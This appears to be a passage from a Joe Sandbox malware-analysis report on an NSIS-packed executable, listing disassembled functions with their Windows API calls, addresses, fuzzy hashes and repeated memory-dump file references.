Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: a052d906e27c43246bcc9f1aeeeeed0a4803bb8fb5ea3e7766d01d4d8a37771c
Instruction ID: aa47155a64d8ebbb4a0163e37034f34a23c06eccf97bc0b219fefb1598c68ac6
Opcode Fuzzy Hash: a052d906e27c43246bcc9f1aeeeeed0a4803bb8fb5ea3e7766d01d4d8a37771c
Instruction Fuzzy Hash: 25014470640108BBDF109F64DD49FAE3BA9AB04304F004139FA06A51E0DBB989558F58

Function 00401497 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014B9
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014F5
RegCloseKey.ADVAPI32(?), ref: 004014FE
RegCloseKey.ADVAPI32(?), ref: 00401523
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401541

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 9a7fa1e295040e987171b31cb3058b13b4927fc82cebbafdfd6fdbcfdef2d769
Instruction ID: 18dccf383a29a435c3c5d53fdb083507bb3959694e3d248e427a957da49423c4
Opcode Fuzzy Hash: 9a7fa1e295040e987171b31cb3058b13b4927fc82cebbafdfd6fdbcfdef2d769
Instruction Fuzzy Hash: B8113776500108FBDF119FA0DE85AAE3B7DEB45348F00443AF90AB51B0D7359E94AE69

Function 004020AF Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?), ref: 004020BF
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?), ref: 004020E0
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 004020F8
VerQueryValueW.VERSION(?,004082C8,?,?,?,00000000,00000000,00000000), ref: 00402111

Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C

GlobalFree.KERNEL32(005CB9E0), ref: 00402139

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 1fcda80dc11e1363c08de8126c867463e0ce0b74cafb0b4a8e36d66cc7975c69
Instruction ID: ca10dc8ef845363045b229a4896d1fbdc02f34fd782a724fb491659cb49530f2
Opcode Fuzzy Hash: 1fcda80dc11e1363c08de8126c867463e0ce0b74cafb0b4a8e36d66cc7975c69
Instruction Fuzzy Hash: 11116A72900204ABDB11ABA5DE08A9E77B9AF04354F108136F605FA1E0EB78D940CB58

Function 00401D76 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,00000000,00000002,?), ref: 00401DDF
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401DF7

Strings

!, xrefs: 00401DAE

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 0a2216d3efa57a78be66af89e8cb1db1661eab1c73c2f6238fd6ec7ea61d154f
Instruction ID: 2bd8fc9b8c4150d32bad90dfffc0448b15bb1a7470975d4e46508bb72c72871e
Opcode Fuzzy Hash: 0a2216d3efa57a78be66af89e8cb1db1661eab1c73c2f6238fd6ec7ea61d154f
Instruction Fuzzy Hash: 77216071940218AADB15AFB4C946BFD7BB5EF05309F10857EFA02B50E1D77C8A809758

Function 00403F13 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0044FD98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,0044FD98,?), ref: 00403FB0
wsprintfW.USER32 ref: 00403FBD
SetDlgItemTextW.USER32(?,0044FD98,000000DF), ref: 00403FD0

Strings

%u.%u%s%s, xrefs: 00403FAA

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 7463db91dfc42c9920fcb0c5be4cc11050eaef945611b5cb4dc0a4985e01960d
Instruction ID: 5fad3c86b264af19ee74e6bf29dedfa0a61a2e47495169cbabc6e73bcd4b5a17
Opcode Fuzzy Hash: 7463db91dfc42c9920fcb0c5be4cc11050eaef945611b5cb4dc0a4985e01960d
Instruction Fuzzy Hash: 12117D32B002087BCB10DB699D41E9E766EEBD5338F10423BF519F31E0EA388A15875C

Function 00406042 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5

Part of subcall function 00405807: CharNextW.USER32(?,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",0045FE18,?,00406059,0045FE18,0045FE18,le@,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",00000002,0040656C,?,004E00C8), ref: 00405815
Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 0040581A
Part of subcall function 00405807: CharNextW.USER32(00000000), ref: 00405832

lstrlenW.KERNEL32(0045FE18,?,00000000,0045FE18,0045FE18,le@,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",00000002,0040656C,?,004E00C8), ref: 004060A3
GetFileAttributesW.KERNEL32(0045FE18,0045FE18), ref: 004060B0

Strings

"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe", xrefs: 00406043
le@, xrefs: 00406044

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: "C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe"$le@
API String ID: 3248276644-1142171758
Opcode ID: fec7732a330a9e88aa59d831f20b6da9eee86d01c908d7265f8837d9fbe5c718
Instruction ID: e7db63e0e35e78dffee219aaf6f46514b8882a9137312b684398864940085c4f
Opcode Fuzzy Hash: fec7732a330a9e88aa59d831f20b6da9eee86d01c908d7265f8837d9fbe5c718
Instruction Fuzzy Hash: DF01F22219592159D622A73A1D88EAF2584CE86364717063FFC43B21D3DF3C896389BE

Function 00405807 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",0045FE18,?,00406059,0045FE18,0045FE18,le@,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",00000002,0040656C,?,004E00C8), ref: 00405815
CharNextW.USER32(00000000), ref: 0040581A
CharNextW.USER32(00000000), ref: 00405832

Strings

"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe", xrefs: 0040580F

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: CharNext
String ID: "C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe"
API String ID: 3213498283-2569130941
Opcode ID: af5ee6a4c00f60c399368bb2218fa231c777b399e1778d3c2c7167b5008f4af5
Instruction ID: 6bad679ef2030d1c163faa7f4315505361f90d2e1b91a9a134f50fab6c33b151
Opcode Fuzzy Hash: af5ee6a4c00f60c399368bb2218fa231c777b399e1778d3c2c7167b5008f4af5
Instruction Fuzzy Hash: 1EF06D23900A20A6DB3177594C55A7B66BCEB54360B00C47FEE41A71C1A2B84CA18EAA

Function 004024F8 Relevance: 6.1, APIs: 4, Instructions: 78registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00402546
lstrlenW.KERNEL32(004120F8), ref: 00402567
RegSetValueExW.ADVAPI32(?,?,00000000,?,004120F8,00000000), ref: 004025A6
RegCloseKey.ADVAPI32(?), ref: 004025B6

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: eb21bdfbd278206649cafd0a134e8c3462c0890b110457211e04b26388198419
Instruction ID: e0ce6b6c9d891c2747ed896ffb728d3f7ff2228f80022de3c727e62f6400905b
Opcode Fuzzy Hash: eb21bdfbd278206649cafd0a134e8c3462c0890b110457211e04b26388198419
Instruction Fuzzy Hash: 6F21B071A00204BBEB10AF65DE89FAF7779EB44714F10813BF504B61E1D7B89A809B6C

Function 00401FFE Relevance: 6.1, APIs: 4, Instructions: 53synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00404A73: lstrlenW.KERNEL32(00447D88,00424D76,74DF23A0,00000000), ref: 00404AAB
Part of subcall function 00404A73: lstrlenW.KERNEL32(0040304D,00447D88,00424D76,74DF23A0,00000000), ref: 00404ABB
Part of subcall function 00404A73: lstrcatW.KERNEL32(00447D88,0040304D), ref: 00404ACE
Part of subcall function 00404A73: SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
Part of subcall function 00404A73: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
Part of subcall function 00404A73: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
Part of subcall function 00404A73: SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E

Part of subcall function 004056EC: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0045FDD0,Error launching installer), ref: 00405711
Part of subcall function 004056EC: CloseHandle.KERNEL32(?), ref: 0040571E

WaitForSingleObject.KERNEL32(00000000,00000064,?,?,?,?,?,00000000,000000EB,00000000), ref: 0040202F
WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,?,?,?,00000000,000000EB,00000000), ref: 00402044
GetExitCodeProcess.KERNEL32(?,?), ref: 00402051
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,000000EB,00000000), ref: 004026BD

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: ad270f84a8785551dbcb8ed3b2656b967ed5d4589d67cc04499c355dac912d43
Instruction ID: 202ebcddbf8b426187c6ee2470dbf35ac1bf8be3455b7115f7585c4331235d23
Opcode Fuzzy Hash: ad270f84a8785551dbcb8ed3b2656b967ed5d4589d67cc04499c355dac912d43
Instruction Fuzzy Hash: 3E118231900214EADB219FA1CE08B9E7A75EB04358F104037E615B60E1C7BD8A82DB5D

Function 004026EF Relevance: 6.0, APIs: 4, Instructions: 46memoryfilestringCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 004026F7
WideCharToMultiByte.KERNEL32(00000000,00000000,0040E0F0,000000FF,?,00002004,00000000,00000000), ref: 00402730
lstrlenA.KERNEL32(?), ref: 00402739
WriteFile.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00402756

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 4e4b35b0ddbdd6058c26d859be66250fdf62ee6eb5fca338a8859292909502b4
Instruction ID: ced7ad9a6504f6ed498d5adba380047bc9decdec085bb0b424ae9f8a02fb9dcb
Opcode Fuzzy Hash: 4e4b35b0ddbdd6058c26d859be66250fdf62ee6eb5fca338a8859292909502b4
Instruction Fuzzy Hash: F9014F70500205BEEB156F60CE4DBBF3A6CEF04744F10453AF641FA1E1DBB849419B69

Function 00401EF0 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401EF7
GetDeviceCaps.GDI32(00000000), ref: 00401EFE
MulDiv.KERNEL32(00000000,00000000), ref: 00401F0E

Part of subcall function 004060CA: GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00424D76,74DF23A0,00000000), ref: 0040619B

CreateFontIndirectW.GDI32(0041E110), ref: 00401F61

Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: a47370298229fbd9087b309e9c05a94d29a3d59c05c16ea411501fa641fe8ea9
Instruction ID: d6c42e3eeef43274fd936db1fda35bedcc132f3233f9f4bb317f1c521d1b95b8
Opcode Fuzzy Hash: a47370298229fbd9087b309e9c05a94d29a3d59c05c16ea411501fa641fe8ea9
Instruction Fuzzy Hash: BB018476644241AFE701ABB5AD4ABDE3BA4A715315F20883AE681B61E3CA784044CB2D

Function 00402E3A Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403297,00000001,?,?,?,00000000,004035D7,?), ref: 00402E4D
GetTickCount.KERNEL32 ref: 00402E6B
